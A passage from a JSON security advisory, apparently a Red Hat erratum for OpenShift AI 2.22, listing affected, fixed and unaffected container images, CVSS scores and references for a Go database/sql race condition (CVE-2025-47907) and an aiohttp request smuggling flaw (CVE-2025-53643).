thoroughly validated, preventing improperly validated inputs from causing system instability, exposing sensitive data, or escalating risks. In the case of successful exploitation, detection and containment controls are in place to limit impacts by alerting on anomalous system behavior in real time, while process isolation and automated orchestration via Kubernetes minimize the likelihood of concurrent execution scenarios that would trigger the race condition and help contain the impact to a single process.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "RHBZ#2387083",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2387083"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-47907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://go.dev/cl/693735",
"url": "https://go.dev/cl/693735"
},
{
"category": "external",
"summary": "https://go.dev/issue/74831",
"url": "https://go.dev/issue/74831"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM",
"url": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-3849",
"url": "https://pkg.go.dev/vuln/GO-2025-3849"
}
],
"release_date": "2025-08-07T15:25:30.704000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "database/sql: Postgres Scan Race Condition"
},
{
"cve": "CVE-2025-53643",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2025-07-14T21:00:57.122280+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2380000"
}
],
"notes": [
{
"category": "description",
"text": "A request smuggling flaw was found in the aiohttp python library. If a pure Python version of aiohttp is installed, without the usual C extensions, for example, or if AIOHTTP_NO_EXTENSIONS is enabled, an attacker can execute a request smuggling attack to bypass certain firewalls or proxy protections.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "aiohttp: AIOHTTP HTTP Request/Response Smuggling",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
